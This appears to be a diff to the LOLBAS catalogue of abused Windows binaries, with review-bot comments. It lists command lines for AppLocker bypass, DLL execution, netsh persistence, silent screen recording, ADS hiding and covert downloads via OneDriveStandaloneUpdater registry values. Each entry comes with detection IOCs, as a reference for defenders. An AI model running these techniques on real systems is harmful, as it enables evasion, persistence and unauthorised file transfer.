Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: mscfgtlc.xml changes in system32 folder
|
- IOC: mscfgtlc.xml changes in system32 folder
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Msdt.exe
|
Name: Msdt.exe
|
||||||
Description: Microsoft diagnostics tool
|
Description: Microsoft diagnostics tool
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||||
@ -23,15 +23,15 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Msdt.exe
|
- Path: C:\Windows\System32\Msdt.exe
|
||||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
- Link: https://twitter.com/harr0ey/status/991338229952598016
|
- Link: https://twitter.com/harr0ey/status/991338229952598016
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
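Review bot: The bare `- Person:` and `Handle:` in the Acknowledgement hunk load as null, not as an empty string, which differs from how the MpCmdRun entry in this same commit spells an unknown handle (`Handle: ''`); a consumer that formats these fields as strings will see `None`/`null` for one file and `''` for the other. The bare `- IOC:` in the Detection hunk of this file, the two bare `Handle:` lines in the Netsh Acknowledgement hunk, and the bare `- IOC:`/`- Code:` entries in the Mmc, Odbcconf, Pcalua, Pcwrun and Presentationhost sections have the same effect. Either write `Person: ''` / `Handle: ''` / `IOC: ''` explicitly or drop the empty entries, consistently across the files touched here.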
|
@ -2,7 +2,7 @@
|
|||||||
Name: Mshta.exe
|
Name: Mshta.exe
|
||||||
Description: Used by Windows to execute html applications. (.hta)
|
Description: Used by Windows to execute html applications. (.hta)
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: mshta.exe evilfile.hta
|
- Command: mshta.exe evilfile.hta
|
||||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||||
@ -39,7 +39,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mshta.exe
|
- Path: C:\Windows\System32\mshta.exe
|
||||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||||
@ -48,10 +48,10 @@ Resources:
|
|||||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Msiexec.exe
|
Name: Msiexec.exe
|
||||||
Description: Used by Windows to execute msi files
|
Description: Used by Windows to execute msi files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: msiexec /quiet /i cmd.msi
|
- Command: msiexec /quiet /i cmd.msi
|
||||||
Description: Installs the target .MSI file silently.
|
Description: Installs the target .MSI file silently.
|
||||||
@ -35,11 +35,11 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\msiexec.exe
|
- Path: C:\Windows\System32\msiexec.exe
|
||||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: msiexec.exe getting files from Internet
|
- IOC: msiexec.exe getting files from Internet
|
||||||
@ -51,4 +51,4 @@ Acknowledgement:
|
|||||||
Handle: '@netbiosX'
|
Handle: '@netbiosX'
|
||||||
- Person: Philip Tsukerman
|
- Person: Philip Tsukerman
|
||||||
Handle: '@PhilipTsukerman'
|
Handle: '@PhilipTsukerman'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Netsh.exe
|
Name: Netsh.exe
|
||||||
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
||||||
Author: 'Freddie Barr-Smith'
|
Author: 'Freddie Barr-Smith'
|
||||||
Created: '2019-12-24'
|
Created: 2019-12-24
|
||||||
Commands:
|
Commands:
|
||||||
- Command: netsh.exe add helper C:\Users\User\file.dll
|
- Command: netsh.exe add helper C:\Users\User\file.dll
|
||||||
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\WINDOWS\System32\Netsh.exe
|
- Path: C:\WINDOWS\System32\Netsh.exe
|
||||||
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Netsh initiating a network connection
|
- IOC: Netsh initiating a network connection
|
||||||
@ -32,4 +32,4 @@ Acknowledgement:
|
|||||||
Handle:
|
Handle:
|
||||||
- Person: 'Xabier Ugarte-Pedrero'
|
- Person: 'Xabier Ugarte-Pedrero'
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Odbcconf.exe
|
Name: Odbcconf.exe
|
||||||
Description: Used in Windows for managing ODBC connections
|
Description: Used in Windows for managing ODBC connections
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: odbcconf -f file.rsp
|
- Command: odbcconf -f file.rsp
|
||||||
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\odbcconf.exe
|
- Path: C:\Windows\System32\odbcconf.exe
|
||||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -36,4 +36,4 @@ Acknowledgement:
|
|||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@Hexacorn'
|
Handle: '@Hexacorn'
|
||||||
---
|
---
|
||||||
|
22
yml/OSBinaries/OfflineScannerShell.yml
@ -0,0 +1,22 @@
|
|||||||
|
---
|
||||||
|
Name: OfflineScannerShell.exe
|
||||||
|
Description: Windows Defender Offline Shell
|
||||||
|
Author: 'Elliot Killick'
|
||||||
|
Created: '2021-08-16'
|
||||||
|
Commands:
|
||||||
|
- Command: OfflineScannerShell
|
||||||
|
Description: Execute mpclient.dll library in the current working directory
|
||||||
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||||
|
Category: Execute
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
|
||||||
|
Detection:
|
||||||
|
- IOC: OfflineScannerShell.exe should not be run on a normal workstation
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Elliot Killick
|
||||||
|
Handle: '@elliotkillick'
|
||||||
|
---
|
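Review bot: The only detection, `- IOC: OfflineScannerShell.exe should not be run on a normal workstation`, states a policy rather than something observable; since the Description says the binary loads mpclient.dll from the current working directory, an image-load indicator is more actionable, e.g. `- IOC: OfflineScannerShell.exe loading mpclient.dll from a directory outside the Windows Defender program directory (presumably under C:\Program Files\Windows Defender)`. `MitreLink: https://attack.mitre.org/wiki/Technique/T1218/` uses the legacy wiki URL form whereas the OneDriveStandaloneUpdater file added in the same commit uses `https://attack.mitre.org/techniques/T1105/`; the two new files should agree on one form. The closing `---` on the last line opens a second, empty document: a single-document loader (`yaml.safe_load`) rejects the file, and `safe_load_all` yields a trailing null document the consumer must skip — presumably the existing tooling copes, since the modified files keep the same trailer, but it is worth confirming for new entries. Unlike the other two new files this one also has no `Resources:` key.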
25
yml/OSBinaries/OneDriveStandaloneUpdater.yml
@ -0,0 +1,25 @@
|
|||||||
|
---
|
||||||
|
Name: OneDriveStandaloneUpdater.exe
|
||||||
|
Description: OneDrive Standalone Updater
|
||||||
|
Author: 'Elliot Killick'
|
||||||
|
Created: '2021-08-22'
|
||||||
|
Commands:
|
||||||
|
- Command: OneDriveStandaloneUpdater
|
||||||
|
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
|
||||||
|
Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
|
||||||
|
Detection:
|
||||||
|
- IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
|
||||||
|
- IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
|
||||||
|
Resources:
|
||||||
|
- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/153
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Elliot Killick
|
||||||
|
Handle: '@elliotkillick'
|
||||||
|
---
|
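Review bot: The `Description:` under `- Command: OneDriveStandaloneUpdater` is a single very long plain scalar carrying four separate statements (the URL value, the two sibling values that must be non-empty, the timestamp requirement, and the output path); written as a folded block scalar (`Description: >-` with one sentence per line) it loads to the same string but reads and diffs far better. The detection side names only the URL value, yet the Description says `ODSUUpdateXMLUrlFromOC`, `UpdateXMLUrlFromOC` and `UpdateOfficeConfigTimestamp` must all be set under the same key before the download happens, so an indicator on the key as a whole would catch the setup step too, e.g. `- IOC: Values under HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig being created or modified by a process that is presumably not OneDrive itself`. The quoted `Full_Path` entry is correct here because the value starts with `%`.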
@ -2,7 +2,7 @@
|
|||||||
Name: Pcalua.exe
|
Name: Pcalua.exe
|
||||||
Description: Program Compatibility Assistant
|
Description: Program Compatibility Assistant
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: pcalua.exe -a calc.exe
|
- Command: pcalua.exe -a calc.exe
|
||||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||||
@ -30,7 +30,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcalua.exe
|
- Path: C:\Windows\System32\pcalua.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -41,4 +41,4 @@ Acknowledgement:
|
|||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
- Person: Fab
|
- Person: Fab
|
||||||
Handle: '@0rbz_'
|
Handle: '@0rbz_'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Pcwrun.exe
|
Name: Pcwrun.exe
|
||||||
Description: Program Compatibility Wizard
|
Description: Program Compatibility Wizard
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Pcwrun.exe c:\temp\beacon.exe
|
- Command: Pcwrun.exe c:\temp\beacon.exe
|
||||||
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcwrun.exe
|
- Path: C:\Windows\System32\pcwrun.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -23,4 +23,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Pierre-Alexandre Braeken
|
- Person: Pierre-Alexandre Braeken
|
||||||
Handle: '@pabraeken'
|
Handle: '@pabraeken'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Pktmon.exe
|
Name: Pktmon.exe
|
||||||
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
||||||
Author: 'Derek Johnson'
|
Author: 'Derek Johnson'
|
||||||
Created: '2020-08-12'
|
Created: 2020-08-12
|
||||||
Commands:
|
Commands:
|
||||||
- Command: pktmon.exe start --etw
|
- Command: pktmon.exe start --etw
|
||||||
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
||||||
@ -23,9 +23,9 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\pktmon.exe
|
- Path: c:\windows\system32\pktmon.exe
|
||||||
- Path: c:\windows\syswow64\pktmon.exe
|
- Path: c:\windows\syswow64\pktmon.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: .etl files found on system
|
- IOC: .etl files found on system
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://binar-x79.com/windows-10-secret-sniffer/
|
- Link: https://binar-x79.com/windows-10-secret-sniffer/
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Presentationhost.exe
|
Name: Presentationhost.exe
|
||||||
Description: File is used for executing Browser applications
|
Description: File is used for executing Browser applications
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
||||||
Description: Executes the target XAML Browser Application (XBAP) file
|
Description: Executes the target XAML Browser Application (XBAP) file
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Presentationhost.exe
|
- Path: C:\Windows\System32\Presentationhost.exe
|
||||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Print.exe
|
Name: Print.exe
|
||||||
Description: Used by Windows to send files to the printer
|
Description: Used by Windows to send files to the printer
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||||
@ -31,7 +31,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\print.exe
|
- Path: C:\Windows\System32\print.exe
|
||||||
- Path: C:\Windows\SysWOW64\print.exe
|
- Path: C:\Windows\SysWOW64\print.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Print.exe getting files from internet
|
- IOC: Print.exe getting files from internet
|
||||||
@ -42,4 +42,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
32
yml/OSBinaries/PrintBrm.yml
@ -0,0 +1,32 @@
|
|||||||
|
---
|
||||||
|
Name: PrintBrm.exe
|
||||||
|
Description: Printer Migration Command-Line Tool
|
||||||
|
Author: 'Elliot Killick'
|
||||||
|
Created: '2021-06-21'
|
||||||
|
Commands:
|
||||||
|
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
|
||||||
|
Description: Create a ZIP file from a folder in a remote drive
|
||||||
|
Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
|
||||||
|
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
|
||||||
|
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
|
||||||
|
Category: ADS
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1096
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1096/
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
|
||||||
|
Detection:
|
||||||
|
- IOC: PrintBrm.exe should not be run on a normal workstation
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/elliotkillick/status/1404117015447670800
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Elliot Killick
|
||||||
|
Handle: '@elliotkillick'
|
||||||
|
---
|
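Review bot: The second command is tagged `MitreID: T1096` / `MitreLink: https://attack.mitre.org/techniques/T1096/`, but T1096 (NTFS File Attributes) appears to have been revoked in ATT&CK and folded into Hide Artifacts: NTFS File Attributes (T1564.004), so the ID will not match current mappings and the link may only redirect — worth checking before merging. In the first command, `Category: Download` and `Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file` point in opposite directions: the command copies from a remote share onto the local disk, which is download/collection rather than exfiltration, so one of the two fields should change. The IOC `PrintBrm.exe should not be run on a normal workstation` is generic; something tied to the arguments the two commands actually use, e.g. `- IOC: PrintBrm.exe invoked with -d naming a UNC path, or with -f/-d naming an alternate data stream`, would be more actionable for a detection engineer.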
@ -2,7 +2,7 @@
|
|||||||
Name: Psr.exe
|
Name: Psr.exe
|
||||||
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
||||||
Author: Leon Rodenko
|
Author: Leon Rodenko
|
||||||
Created: '2020-06-27'
|
Created: 2020-06-27
|
||||||
Commands:
|
Commands:
|
||||||
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
||||||
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
||||||
@ -15,9 +15,9 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\psr.exe
|
- Path: c:\windows\system32\psr.exe
|
||||||
- Path: c:\windows\syswow64\psr.exe
|
- Path: c:\windows\syswow64\psr.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: psr.exe spawned
|
- IOC: psr.exe spawned
|
||||||
- IOC: suspicious activity when running with "/gui 0" flag
|
- IOC: suspicious activity when running with "/gui 0" flag
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -2,9 +2,9 @@
|
|||||||
Name: Rasautou.exe
|
Name: Rasautou.exe
|
||||||
Description: Windows Remote Access Dialer
|
Description: Windows Remote Access Dialer
|
||||||
Author: 'Tony Lambert'
|
Author: 'Tony Lambert'
|
||||||
Created: '2020-01-10'
|
Created: 2020-01-10
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||||
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
||||||
Usecase: Execute DLL code
|
Usecase: Execute DLL code
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rasautou.exe
|
- Path: C:\Windows\System32\rasautou.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: rasautou.exe command line containing -d and -p
|
- IOC: rasautou.exe command line containing -d and -p
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: FireEye
|
- Person: FireEye
|
||||||
Handle: '@FireEye'
|
Handle: '@FireEye'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Reg.exe
|
Name: Reg.exe
|
||||||
Description: Used to manipulate the registry
|
Description: Used to manipulate the registry
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\reg.exe
|
- Path: C:\Windows\System32\reg.exe
|
||||||
- Path: C:\Windows\SysWOW64\reg.exe
|
- Path: C:\Windows\SysWOW64\reg.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: reg.exe writing to an ADS
|
- IOC: reg.exe writing to an ADS
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,9 +2,9 @@
|
|||||||
Name: Regasm.exe
|
Name: Regasm.exe
|
||||||
Description: Part of .NET
|
Description: Part of .NET
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: regasm.exe AllTheThingsx64.dll
|
- Command: regasm.exe AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
